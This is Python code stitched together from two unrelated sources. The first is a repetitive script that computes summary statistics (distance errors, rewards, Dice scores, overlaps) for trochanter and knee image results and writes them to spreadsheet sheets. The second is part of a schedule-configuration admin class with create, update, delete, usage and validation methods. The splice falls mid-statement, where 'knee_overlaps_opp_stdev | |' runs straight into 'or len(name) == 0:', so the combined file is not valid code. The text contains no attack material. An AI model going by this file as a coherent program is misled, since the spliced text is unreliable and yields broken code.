kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_stdev)
kidney_row += 1
################# trochanter ###################
troch_dist_errors_min = min(troch_dist_errors)
troch_total_rewards_min = min(troch_total_rewards)
troch_dices_min = min(troch_dices)
troch_overlaps_min = min(troch_overlaps)
troch_dist_errors_max = max(troch_dist_errors)
troch_total_rewards_max = max(troch_total_rewards)
troch_dices_max = max(troch_dices)
troch_overlaps_max = max(troch_overlaps)
troch_dist_errors_med = statistics.median(troch_dist_errors)
troch_total_rewards_med = statistics.median(troch_total_rewards)
troch_dices_med = statistics.median(troch_dices)
troch_overlaps_med = statistics.median(troch_overlaps)
troch_dist_errors_mean = statistics.mean(troch_dist_errors)
troch_total_rewards_mean = statistics.mean(troch_total_rewards)
troch_dices_mean = statistics.mean(troch_dices)
troch_overlaps_mean = statistics.mean(troch_overlaps)
troch_dist_errors_stdev = statistics.stdev(troch_dist_errors)
troch_total_rewards_stdev = statistics.stdev(troch_total_rewards)
troch_dices_stdev = statistics.stdev(troch_dices)
troch_overlaps_stdev = statistics.stdev(troch_overlaps)
troch_dist_errors_in_min = min(troch_dist_errors_in)
troch_total_rewards_in_min = min(troch_total_rewards_in)
troch_dices_in_min = min(troch_dices_in)
troch_overlaps_in_min = min(troch_overlaps_in)
troch_dist_errors_in_max = max(troch_dist_errors_in)
troch_total_rewards_in_max = max(troch_total_rewards_in)
troch_dices_in_max = max(troch_dices_in)
troch_overlaps_in_max = max(troch_overlaps_in)
troch_dist_errors_in_med = statistics.median(troch_dist_errors_in)
troch_total_rewards_in_med = statistics.median(troch_total_rewards_in)
troch_dices_in_med = statistics.median(troch_dices_in)
troch_overlaps_in_med = statistics.median(troch_overlaps_in)
troch_dist_errors_in_mean = statistics.mean(troch_dist_errors_in)
troch_total_rewards_in_mean = statistics.mean(troch_total_rewards_in)
troch_dices_in_mean = statistics.mean(troch_dices_in)
troch_overlaps_in_mean = statistics.mean(troch_overlaps_in)
troch_dist_errors_in_stdev = statistics.stdev(troch_dist_errors_in)
troch_total_rewards_in_stdev = statistics.stdev(troch_total_rewards_in)
troch_dices_in_stdev = statistics.stdev(troch_dices_in)
troch_overlaps_in_stdev = statistics.stdev(troch_overlaps_in)
troch_dist_errors_opp_min = min(troch_dist_errors_opp)
troch_total_rewards_opp_min = min(troch_total_rewards_opp)
troch_dices_opp_min = min(troch_dices_opp)
troch_overlaps_opp_min = min(troch_overlaps_opp)
troch_dist_errors_opp_max = max(troch_dist_errors_opp)
troch_total_rewards_opp_max = max(troch_total_rewards_opp)
troch_dices_opp_max = max(troch_dices_opp)
troch_overlaps_opp_max = max(troch_overlaps_opp)
troch_dist_errors_opp_med = statistics.median(troch_dist_errors_opp)
troch_total_rewards_opp_med = statistics.median(troch_total_rewards_opp)
troch_dices_opp_med = statistics.median(troch_dices_opp)
troch_overlaps_opp_med = statistics.median(troch_overlaps_opp)
troch_dist_errors_opp_mean = statistics.mean(troch_dist_errors_opp)
troch_total_rewards_opp_mean = statistics.mean(troch_total_rewards_opp)
troch_dices_opp_mean = statistics.mean(troch_dices_opp)
troch_overlaps_opp_mean = statistics.mean(troch_overlaps_opp)
troch_dist_errors_opp_stdev = statistics.stdev(troch_dist_errors_opp)
troch_total_rewards_opp_stdev = statistics.stdev(troch_total_rewards_opp)
troch_dices_opp_stdev = statistics.stdev(troch_dices_opp)
troch_overlaps_opp_stdev = statistics.stdev(troch_overlaps_opp)
troch_dist_errors_F_min = min(troch_dist_errors_F)
troch_total_rewards_F_min = min(troch_total_rewards_F)
troch_dices_F_min = min(troch_dices_F)
troch_overlaps_F_min = min(troch_overlaps_F)
troch_dist_errors_F_max = max(troch_dist_errors_F)
troch_total_rewards_F_max = max(troch_total_rewards_F)
troch_dices_F_max = max(troch_dices_F)
troch_overlaps_F_max = max(troch_overlaps_F)
troch_dist_errors_F_med = statistics.median(troch_dist_errors_F)
troch_total_rewards_F_med = statistics.median(troch_total_rewards_F)
troch_dices_F_med = statistics.median(troch_dices_F)
troch_overlaps_F_med = statistics.median(troch_overlaps_F)
troch_dist_errors_F_mean = statistics.mean(troch_dist_errors_F)
troch_total_rewards_F_mean = statistics.mean(troch_total_rewards_F)
troch_dices_F_mean = statistics.mean(troch_dices_F)
troch_overlaps_F_mean = statistics.mean(troch_overlaps_F)
troch_dist_errors_F_stdev = statistics.stdev(troch_dist_errors_F)
troch_total_rewards_F_stdev = statistics.stdev(troch_total_rewards_F)
troch_dices_F_stdev = statistics.stdev(troch_dices_F)
troch_overlaps_F_stdev = statistics.stdev(troch_overlaps_F)
troch_dist_errors_W_min = min(troch_dist_errors_W)
troch_total_rewards_W_min = min(troch_total_rewards_W)
troch_dices_W_min = min(troch_dices_W)
troch_overlaps_W_min = min(troch_overlaps_W)
troch_dist_errors_W_max = max(troch_dist_errors_W)
troch_total_rewards_W_max = max(troch_total_rewards_W)
troch_dices_W_max = max(troch_dices_W)
troch_overlaps_W_max = max(troch_overlaps_W)
troch_dist_errors_W_med = statistics.median(troch_dist_errors_W)
troch_total_rewards_W_med = statistics.median(troch_total_rewards_W)
troch_dices_W_med = statistics.median(troch_dices_W)
troch_overlaps_W_med = statistics.median(troch_overlaps_W)
troch_dist_errors_W_mean = statistics.mean(troch_dist_errors_W)
troch_total_rewards_W_mean = statistics.mean(troch_total_rewards_W)
troch_dices_W_mean = statistics.mean(troch_dices_W)
troch_overlaps_W_mean = statistics.mean(troch_overlaps_W)
troch_dist_errors_W_stdev = statistics.stdev(troch_dist_errors_W)
troch_total_rewards_W_stdev = statistics.stdev(troch_total_rewards_W)
troch_dices_W_stdev = statistics.stdev(troch_dices_W)
troch_overlaps_W_stdev = statistics.stdev(troch_overlaps_W)
troch_dist_errors_T1_min = min(troch_dist_errors_T1)
troch_total_rewards_T1_min = min(troch_total_rewards_T1)
troch_dices_T1_min = min(troch_dices_T1)
troch_overlaps_T1_min = min(troch_overlaps_T1)
troch_dist_errors_T1_max = max(troch_dist_errors_T1)
troch_total_rewards_T1_max = max(troch_total_rewards_T1)
troch_dices_T1_max = max(troch_dices_T1)
troch_overlaps_T1_max = max(troch_overlaps_T1)
troch_dist_errors_T1_med = statistics.median(troch_dist_errors_T1)
troch_total_rewards_T1_med = statistics.median(troch_total_rewards_T1)
troch_dices_T1_med = statistics.median(troch_dices_T1)
troch_overlaps_T1_med = statistics.median(troch_overlaps_T1)
troch_dist_errors_T1_mean = statistics.mean(troch_dist_errors_T1)
troch_total_rewards_T1_mean = statistics.mean(troch_total_rewards_T1)
troch_dices_T1_mean = statistics.mean(troch_dices_T1)
troch_overlaps_T1_mean = statistics.mean(troch_overlaps_T1)
troch_dist_errors_T1_stdev = statistics.stdev(troch_dist_errors_T1)
troch_total_rewards_T1_stdev = statistics.stdev(troch_total_rewards_T1)
troch_dices_T1_stdev = statistics.stdev(troch_dices_T1)
troch_overlaps_T1_stdev = statistics.stdev(troch_overlaps_T1)
troch_dist_errors_T2_min = min(troch_dist_errors_T2)
troch_total_rewards_T2_min = min(troch_total_rewards_T2)
troch_dices_T2_min = min(troch_dices_T2)
troch_overlaps_T2_min = min(troch_overlaps_T2)
troch_dist_errors_T2_max = max(troch_dist_errors_T2)
troch_total_rewards_T2_max = max(troch_total_rewards_T2)
troch_dices_T2_max = max(troch_dices_T2)
troch_overlaps_T2_max = max(troch_overlaps_T2)
troch_dist_errors_T2_med = statistics.median(troch_dist_errors_T2)
troch_total_rewards_T2_med = statistics.median(troch_total_rewards_T2)
troch_dices_T2_med = statistics.median(troch_dices_T2)
troch_overlaps_T2_med = statistics.median(troch_overlaps_T2)
troch_dist_errors_T2_mean = statistics.mean(troch_dist_errors_T2)
troch_total_rewards_T2_mean = statistics.mean(troch_total_rewards_T2)
troch_dices_T2_mean = statistics.mean(troch_dices_T2)
troch_overlaps_T2_mean = statistics.mean(troch_overlaps_T2)
troch_dist_errors_T2_stdev = statistics.stdev(troch_dist_errors_T2)
troch_total_rewards_T2_stdev = statistics.stdev(troch_total_rewards_T2)
troch_dices_T2_stdev = statistics.stdev(troch_dices_T2)
troch_overlaps_T2_stdev = statistics.stdev(troch_overlaps_T2)
troch_sheet.write(troch_row,0,"min all troch img params")
troch_sheet.write(troch_row,1,troch_dist_errors_min)
troch_sheet.write(troch_row,2,troch_total_rewards_min)
troch_sheet.write(troch_row,3,troch_dices_min)
troch_sheet.write(troch_row,4,troch_overlaps_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max all troch img params")
troch_sheet.write(troch_row,1,troch_dist_errors_max)
troch_sheet.write(troch_row,2,troch_total_rewards_max)
troch_sheet.write(troch_row,3,troch_dices_max)
troch_sheet.write(troch_row,4,troch_overlaps_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median all troch img params")
troch_sheet.write(troch_row,1,troch_dist_errors_med)
troch_sheet.write(troch_row,2,troch_total_rewards_med)
troch_sheet.write(troch_row,3,troch_dices_med)
troch_sheet.write(troch_row,4,troch_overlaps_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean all troch img params")
troch_sheet.write(troch_row,1,troch_dist_errors_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_mean)
troch_sheet.write(troch_row,3,troch_dices_mean)
troch_sheet.write(troch_row,4,troch_overlaps_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev all trochimg params")
troch_sheet.write(troch_row,1,troch_dist_errors_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_stdev)
troch_sheet.write(troch_row,3,troch_dices_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_min)
troch_sheet.write(troch_row,2,troch_total_rewards_in_min)
troch_sheet.write(troch_row,3,troch_dices_in_min)
troch_sheet.write(troch_row,4,troch_overlaps_in_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_max)
troch_sheet.write(troch_row,2,troch_total_rewards_in_max)
troch_sheet.write(troch_row,3,troch_dices_in_max)
troch_sheet.write(troch_row,4,troch_overlaps_in_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_med)
troch_sheet.write(troch_row,2,troch_total_rewards_in_med)
troch_sheet.write(troch_row,3,troch_dices_in_med)
troch_sheet.write(troch_row,4,troch_overlaps_in_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_in_mean)
troch_sheet.write(troch_row,3,troch_dices_in_mean)
troch_sheet.write(troch_row,4,troch_overlaps_in_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_in_stdev)
troch_sheet.write(troch_row,3,troch_dices_in_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_in_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_min)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_min)
troch_sheet.write(troch_row,3,troch_dices_opp_min)
troch_sheet.write(troch_row,4,troch_overlaps_opp_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_max)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_max)
troch_sheet.write(troch_row,3,troch_dices_opp_max)
troch_sheet.write(troch_row,4,troch_overlaps_opp_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_med)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_med)
troch_sheet.write(troch_row,3,troch_dices_opp_med)
troch_sheet.write(troch_row,4,troch_overlaps_opp_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_mean)
troch_sheet.write(troch_row,3,troch_dices_opp_mean)
troch_sheet.write(troch_row,4,troch_overlaps_opp_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_stdev)
troch_sheet.write(troch_row,3,troch_dices_opp_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_opp_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_min)
troch_sheet.write(troch_row,2,troch_total_rewards_F_min)
troch_sheet.write(troch_row,3,troch_dices_F_min)
troch_sheet.write(troch_row,4,troch_overlaps_F_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_max)
troch_sheet.write(troch_row,2,troch_total_rewards_F_max)
troch_sheet.write(troch_row,3,troch_dices_F_max)
troch_sheet.write(troch_row,4,troch_overlaps_F_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_med)
troch_sheet.write(troch_row,2,troch_total_rewards_F_med)
troch_sheet.write(troch_row,3,troch_dices_F_med)
troch_sheet.write(troch_row,4,troch_overlaps_F_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_F_mean)
troch_sheet.write(troch_row,3,troch_dices_F_mean)
troch_sheet.write(troch_row,4,troch_overlaps_F_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_F_stdev)
troch_sheet.write(troch_row,3,troch_dices_F_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_F_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_min)
troch_sheet.write(troch_row,2,troch_total_rewards_W_min)
troch_sheet.write(troch_row,3,troch_dices_W_min)
troch_sheet.write(troch_row,4,troch_overlaps_W_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_max)
troch_sheet.write(troch_row,2,troch_total_rewards_W_max)
troch_sheet.write(troch_row,3,troch_dices_W_max)
troch_sheet.write(troch_row,4,troch_overlaps_W_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_med)
troch_sheet.write(troch_row,2,troch_total_rewards_W_med)
troch_sheet.write(troch_row,3,troch_dices_W_med)
troch_sheet.write(troch_row,4,troch_overlaps_W_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_W_mean)
troch_sheet.write(troch_row,3,troch_dices_W_mean)
troch_sheet.write(troch_row,4,troch_overlaps_W_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_W_stdev)
troch_sheet.write(troch_row,3,troch_dices_W_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_W_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_min)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_min)
troch_sheet.write(troch_row,3,troch_dices_T1_min)
troch_sheet.write(troch_row,4,troch_overlaps_T1_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_max)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_max)
troch_sheet.write(troch_row,3,troch_dices_T1_max)
troch_sheet.write(troch_row,4,troch_overlaps_T1_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_med)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_med)
troch_sheet.write(troch_row,3,troch_dices_T1_med)
troch_sheet.write(troch_row,4,troch_overlaps_T1_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_mean)
troch_sheet.write(troch_row,3,troch_dices_T1_mean)
troch_sheet.write(troch_row,4,troch_overlaps_T1_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_stdev)
troch_sheet.write(troch_row,3,troch_dices_T1_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_T1_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_min)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_min)
troch_sheet.write(troch_row,3,troch_dices_T2_min)
troch_sheet.write(troch_row,4,troch_overlaps_T2_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_max)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_max)
troch_sheet.write(troch_row,3,troch_dices_T2_max)
troch_sheet.write(troch_row,4,troch_overlaps_T2_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_med)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_med)
troch_sheet.write(troch_row,3,troch_dices_T2_med)
troch_sheet.write(troch_row,4,troch_overlaps_T2_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_mean)
troch_sheet.write(troch_row,3,troch_dices_T2_mean)
troch_sheet.write(troch_row,4,troch_overlaps_T2_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_stdev)
troch_sheet.write(troch_row,3,troch_dices_T2_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_T2_stdev)
troch_row += 1
################## knee ###################
knee_dist_errors_min = min(knee_dist_errors)
knee_total_rewards_min = min(knee_total_rewards)
knee_dices_min = min(knee_dices)
knee_overlaps_min = min(knee_overlaps)
knee_dist_errors_max = max(knee_dist_errors)
knee_total_rewards_max = max(knee_total_rewards)
knee_dices_max = max(knee_dices)
knee_overlaps_max = max(knee_overlaps)
knee_dist_errors_med = statistics.median(knee_dist_errors)
knee_total_rewards_med = statistics.median(knee_total_rewards)
knee_dices_med = statistics.median(knee_dices)
knee_overlaps_med = statistics.median(knee_overlaps)
knee_dist_errors_mean = statistics.mean(knee_dist_errors)
knee_total_rewards_mean = statistics.mean(knee_total_rewards)
knee_dices_mean = statistics.mean(knee_dices)
knee_overlaps_mean = statistics.mean(knee_overlaps)
knee_dist_errors_stdev = statistics.stdev(knee_dist_errors)
knee_total_rewards_stdev = statistics.stdev(knee_total_rewards)
knee_dices_stdev = statistics.stdev(knee_dices)
knee_overlaps_stdev = statistics.stdev(knee_overlaps)
knee_dist_errors_in_min = min(knee_dist_errors_in)
knee_total_rewards_in_min = min(knee_total_rewards_in)
knee_dices_in_min = min(knee_dices_in)
knee_overlaps_in_min = min(knee_overlaps_in)
knee_dist_errors_in_max = max(knee_dist_errors_in)
knee_total_rewards_in_max = max(knee_total_rewards_in)
knee_dices_in_max = max(knee_dices_in)
knee_overlaps_in_max = max(knee_overlaps_in)
knee_dist_errors_in_med = statistics.median(knee_dist_errors_in)
knee_total_rewards_in_med = statistics.median(knee_total_rewards_in)
knee_dices_in_med = statistics.median(knee_dices_in)
knee_overlaps_in_med = statistics.median(knee_overlaps_in)
knee_dist_errors_in_mean = statistics.mean(knee_dist_errors_in)
knee_total_rewards_in_mean = statistics.mean(knee_total_rewards_in)
knee_dices_in_mean = statistics.mean(knee_dices_in)
knee_overlaps_in_mean = statistics.mean(knee_overlaps_in)
knee_dist_errors_in_stdev = statistics.stdev(knee_dist_errors_in)
knee_total_rewards_in_stdev = statistics.stdev(knee_total_rewards_in)
knee_dices_in_stdev = statistics.stdev(knee_dices_in)
knee_overlaps_in_stdev = statistics.stdev(knee_overlaps_in)
knee_dist_errors_opp_min = min(knee_dist_errors_opp)
knee_total_rewards_opp_min = min(knee_total_rewards_opp)
knee_dices_opp_min = min(knee_dices_opp)
knee_overlaps_opp_min = min(knee_overlaps_opp)
knee_dist_errors_opp_max = max(knee_dist_errors_opp)
knee_total_rewards_opp_max = max(knee_total_rewards_opp)
knee_dices_opp_max = max(knee_dices_opp)
knee_overlaps_opp_max = max(knee_overlaps_opp)
knee_dist_errors_opp_med = statistics.median(knee_dist_errors_opp)
knee_total_rewards_opp_med = statistics.median(knee_total_rewards_opp)
knee_dices_opp_med = statistics.median(knee_dices_opp)
knee_overlaps_opp_med = statistics.median(knee_overlaps_opp)
knee_dist_errors_opp_mean = statistics.mean(knee_dist_errors_opp)
knee_total_rewards_opp_mean = statistics.mean(knee_total_rewards_opp)
knee_dices_opp_mean = statistics.mean(knee_dices_opp)
knee_overlaps_opp_mean = statistics.mean(knee_overlaps_opp)
knee_dist_errors_opp_stdev = statistics.stdev(knee_dist_errors_opp)
knee_total_rewards_opp_stdev = statistics.stdev(knee_total_rewards_opp)
knee_dices_opp_stdev = statistics.stdev(knee_dices_opp)
knee_overlaps_opp_stdev | |
or len(name) == 0:
raise ValueError(ERR_GET_SCHEDULE_NAME_EMPTY)
schedule = self._get_schedule(name)
if schedule is None:
if exception_if_not_exists:
raise ValueError(ERR_GET_SCHEDULE_NOT_FOUND.format(name))
return None
return {"schedule": ConfigAdmin._for_output(schedule)}
def create_schedule(self, **kwargs):
    """Create a new schedule.

    :param kwargs: schedule data, see _validate_schedule for allowed parameters
    :return: dict holding the validated data of the stored schedule
    :raises ValueError: if a schedule with the same name already exists
    """
    validated = self._validate_schedule(**kwargs)
    name = validated[configuration.NAME]
    # Refuse to overwrite an existing schedule; update_schedule handles that case.
    if self._get_schedule(name) is not None:
        raise ValueError(ERR_CREATE_SCHEDULE_EXISTS.format(name))
    self._table.put_item_with_retries(Item=validated)
    return {"schedule": ConfigAdmin._for_output(validated)}
def update_schedule(self, **kwargs):
    """Update an existing schedule.

    :param kwargs: schedule data, see _validate_schedule for allowed parameters
    :return: dict holding the validated data of the updated schedule
    :raises ValueError: for an empty name or a schedule that does not exist
    """
    validated = self._validate_schedule(**kwargs)
    name = validated[configuration.NAME]
    if not name:
        raise ValueError(ERR_UPDATE_SCHEDULE_NAME_EMPTY)
    # Only existing schedules may be updated; create_schedule handles new ones.
    if self._get_schedule(name) is None:
        raise ValueError(ERR_UPDATE_SCHEDULE_NOT_FOUND.format(name))
    self._table.put_item_with_retries(Item=validated)
    return {"schedule": ConfigAdmin._for_output(validated)}
def delete_schedule(self, name, exception_if_not_exists=True):
    """Delete a schedule.

    :param name: name of the schedule
    :param exception_if_not_exists: raise when the schedule does not exist
    :return: dict with the deleted schedule name, or None if it did not exist
    :raises ValueError: for an empty name, or (optionally) a missing schedule
    """
    if not name:
        raise ValueError(ERR_DEL_SCHEDULE_NAME_EMPTY)
    if self._get_schedule(name) is None:
        if exception_if_not_exists:
            raise ValueError(ERR_DEL_SCHEDULE_NOT_FOUND.format(name))
        return None
    self._table.delete_item_with_retries(Key={"name": name, "type": "schedule"})
    return {"schedule": name}
def get_schedule_usage(self, name, startdate=None, enddate=None):
    """Get running periods for a schedule within a date range.

    :param name: name of the schedule
    :param startdate: start of the range, datetime or "YYYYMMDD" string; None means today
    :param enddate: end of the range, datetime or "YYYYMMDD" string; None means startdate
    :return: JSON-serializable dict of running periods and billing figures
    :raises ValueError: for an empty name, unparsable dates, start later than
        end, or an unknown schedule
    """
    if not name:
        raise ValueError(ERR_GET_USAGE_SCHEDULE_NAME_EMPTY)
    # Accept datetime instances as-is; parse strings in YYYYMMDD format.
    if startdate:
        if isinstance(startdate, datetime):
            start = startdate
        else:
            try:
                start = datetime.strptime(startdate, "%Y%m%d")
            except ValueError as ex:
                raise ValueError(
                    ERR_GET_USAGE_INVALID_START_DATE.format(startdate, str(ex)))
    else:
        start = datetime.now()
    if enddate:
        if isinstance(enddate, datetime):
            end = enddate
        else:
            try:
                end = datetime.strptime(enddate, "%Y%m%d")
            except ValueError as ex:
                raise ValueError(
                    ERR_GET_USAGE_INVALID_END_DATE.format(enddate, str(ex)))
    else:
        # default: a single-day range ending at the start date
        end = start
    if start > end:
        raise ValueError(ERR_GET_USAGE_START_MUST_BE_LESS_OR_EQUAL_STOP)
    schedule = self.configuration.get_schedule(name)
    if schedule is None:
        raise ValueError(ERR_GET_USAGE_SCHEDULE_NOT_FOUND.format(name))
    periods = self.calculate_schedule_usage_for_period(name, start_dt=start, stop_dt=end)
    # Round-trip through JSON (custom encoder) so datetimes become strings.
    return ConfigAdmin._for_output(periods)
@staticmethod
def _for_output(item):
    """Serialize ``item`` to JSON and back so datetimes and sets become
    plain strings and lists (via the custom encoder)."""
    return json.loads(json.dumps(item, cls=ConfigAdmin.CustomEncoder))
@staticmethod
def _ensure_set(s):
    """Coerce a list or comma-separated string to a set; anything else is
    passed through unchanged."""
    if isinstance(s, str):
        return set(s.split(","))
    if isinstance(s, list):
        return set(s)
    return s
@staticmethod
def _set_as_list(s):
    """Return a set as a list; non-set values are returned unchanged."""
    return list(s) if isinstance(s, set) else s
@staticmethod
def _ensure_bool(b):
    """Map any value whose string form is "true"/"false" (case-insensitive)
    to True/False; return None for anything else."""
    return {"true": True, "false": False}.get(str(b).lower())
def _validate_period(self, **period):
    """Validate the fields of a period and normalize them for storage.

    Fix: the months/monthdays validators used bare ``except:`` clauses,
    which also swallow ``KeyboardInterrupt``/``SystemExit``; narrowed to
    ``except Exception``.

    :param period: period attributes (name, description, begintime,
        endtime, weekdays, monthdays, months)
    :return: validated period item with the config type attribute set
    :raises ValueError: for unknown parameters, malformed times or day
        sets, a missing name, or a period without any running condition
    """
    def is_valid_time(s):
        return re.match(ConfigAdmin.TIME_REGEX, s) is not None

    # allowed and validated parameters
    valid_parameters = [configuration.BEGINTIME,
                        configuration.ENDTIME,
                        configuration.WEEKDAYS,
                        configuration.MONTHDAYS,
                        configuration.MONTHS,
                        configuration.NAME,
                        configuration.DESCRIPTION]
    result = {}
    for attr in period:
        # indicates the type of the config entry, not user data
        if attr == ConfigAdmin.TYPE_ATTR:
            continue
        if attr not in valid_parameters:
            raise ValueError(ERR_PERIOD_UNKNOWN_PARAMETER.format(attr, str(valid_parameters)))
        # drop None/empty values entirely
        if period[attr] is None or len(str(period[attr])) == 0:
            continue
        # free-form attributes are copied through unchanged
        if attr in (configuration.NAME, configuration.DESCRIPTION):
            result[attr] = period[attr]
            continue
        # begin/end times: check the format, then normalize via a
        # strptime round-trip truncated to the configured format length
        if attr in (configuration.BEGINTIME, configuration.ENDTIME):
            time_str = period[attr]
            if not is_valid_time(time_str):
                raise ValueError(ERR_PERIOD_INVALID_TIME.format(attr, time_str))
            result[attr] = str(datetime.strptime(time_str, configuration.TIME_FORMAT_STRING).time())[
                0:len(configuration.TIME_FORMAT_STRING)]
            # once both ends are known the period may not end before it begins
            if configuration.BEGINTIME in result and configuration.ENDTIME in result:
                begintime = datetime.strptime(result[configuration.BEGINTIME],
                                              configuration.TIME_FORMAT_STRING).time()
                endtime = datetime.strptime(result[configuration.ENDTIME],
                                            configuration.TIME_FORMAT_STRING).time()
                if begintime > endtime:
                    raise ValueError(ERR_PERIOD_BEGIN_LATER_THAN_END.format(
                        result[configuration.BEGINTIME], result[configuration.ENDTIME]))
            continue
        # weekday, monthday and month selectors are stored as sets and
        # validated by the corresponding set builders
        if attr in (configuration.WEEKDAYS, configuration.MONTHDAYS, configuration.MONTHS):
            values = self._ensure_set(period[attr])
            if len(values) == 0:
                continue
            if attr == configuration.MONTHS:
                try:
                    MonthSetBuilder().build(values)
                    result[attr] = values
                    continue
                except Exception:
                    raise ValueError(ERR_PERIOD_INVALID_MONTHS.format(str(period[attr])))
            if attr == configuration.WEEKDAYS:
                try:
                    # fixed date so "nth weekday of month" syntax can be checked
                    WeekdaySetBuilder(year=2016, month=12, day=31).build(values)
                    result[attr] = values
                    continue
                except Exception as ex:
                    raise ValueError(ERR_PERIOD_INVALID_WEEKDAYS.format(str(period[attr]), ex))
            if attr == configuration.MONTHDAYS:
                try:
                    MonthdaySetBuilder(year=2016, month=12).build(values)
                    result[attr] = values
                    continue
                except Exception:
                    raise ValueError(ERR_PERIOD_INVALID_MONTHDAYS.format(str(period[attr])))
    if configuration.NAME not in result:
        raise ValueError(ERR_NAME_PARAM_MISSING)
    # a period must define at least one running condition
    for condition in (configuration.BEGINTIME,
                      configuration.ENDTIME,
                      configuration.WEEKDAYS,
                      configuration.MONTHS,
                      configuration.MONTHDAYS):
        if condition in result:
            break
    else:
        raise ValueError(ERR_NO_PERIODS)
    result[ConfigAdmin.TYPE_ATTR] = configuration.PERIOD
    return result
def _validate_schedule(self, **schedule):
    """Validate schedule fields before the item is written to the table.

    :param schedule: schedule attributes
    :return: validated schedule item with the config type attribute set
    :raises ValueError: for unknown parameters, invalid booleans or
        timezones, mutually exclusive overwrite/override settings, a
